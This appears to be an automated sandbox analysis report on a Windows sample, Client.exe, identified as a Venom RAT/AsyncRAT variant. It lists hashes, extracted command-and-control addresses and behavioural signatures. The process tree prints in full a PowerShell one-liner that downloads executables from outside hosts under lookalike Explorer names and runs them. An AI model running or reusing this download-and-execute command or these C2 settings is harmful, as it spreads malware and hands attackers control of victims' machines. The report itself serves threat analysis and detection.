Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2024 21:07
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20241010-en
General
-
Target
Client.exe
-
Size
75KB
-
MD5
0cc47ff18d0e3298f9beab60d3aa579e
-
SHA1
67c3020a046707cbde4dea02352272d6e6b77189
-
SHA256
87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212
-
SHA512
e0f0627aa715665a27e3b505af264c3c2500b9414764d028fa0ecba0dc979a187f75baf4f97b4793b31325dda65310d8a3e3eccfe676b1f7b13e47334b5fe5b3
-
SSDEEP
1536:fukU0OSeCX/PMRkYKt2OlY6H1bf/i7AkzkiLVclN:fXUHjAPMRkYv4jH1bfVk7BY
Malware Config
Extracted
http://xcu.exgaming.click
Extracted
http://xcu5.exgaming.click
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
51.254.53.24:4449
86.68.222.14:4449
ygfmgwcmzefwhl
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Processes:
resource yara_rule behavioral2/memory/3476-1-0x0000000000C70000-0x0000000000C88000-memory.dmp VenomRAT -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Client.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Client.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 5072 powershell.exe 4800 powershell.exe 1864 powershell.exe 3176 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeClient.exepid process 1864 powershell.exe 1864 powershell.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe 3476 Client.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Client.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3476 Client.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 3476 Client.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
Client.execmd.exedescription pid process target process PID 3476 wrote to memory of 2512 3476 Client.exe cmd.exe PID 3476 wrote to memory of 2512 3476 Client.exe cmd.exe PID 2512 wrote to memory of 1864 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 1864 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 3176 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 3176 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 5072 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 5072 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 4800 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 4800 2512 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5aa8efa56e1e40374bbd21e0e469dceb7
SHA133a592799d4898c6efdd29e132f2f76ec51dbc08
SHA25625eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096
-
Filesize
1KB
MD5fb4cb72fdb972bec9083e291598e5107
SHA16208b997143f2ab175ac2bc5b827547c01ba9339
SHA256a68190a9f6559f74a8c0ac2eef3b36b990d2cc032d8e3b565b6db38ac2f33ef6
SHA5123b34b2ec66dc18869c75207d9a6b3001d4ba451404de7e64aaab3b41f822607aeb8997963d925bf1363d00ee354c44574b87c5573d8a3f044625992fc8614ba5
-
Filesize
1KB
MD5cf989d8b59ce7eb32775f651bfe5887c
SHA1790b46aba93b4571facca9d3b6dc4d07ad0a53b2
SHA2567b229a233c8625cd83ca18f6853abfb05f32a1b31455fcd2cb90005a4575490c
SHA512782b93a7173805ad42caa07ca2bfcd3c3ced136a04554765189e7bdde0518b29b29eb33446327f22f6d370030f10e08a54687557944ddeec0c223a2623e220f7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82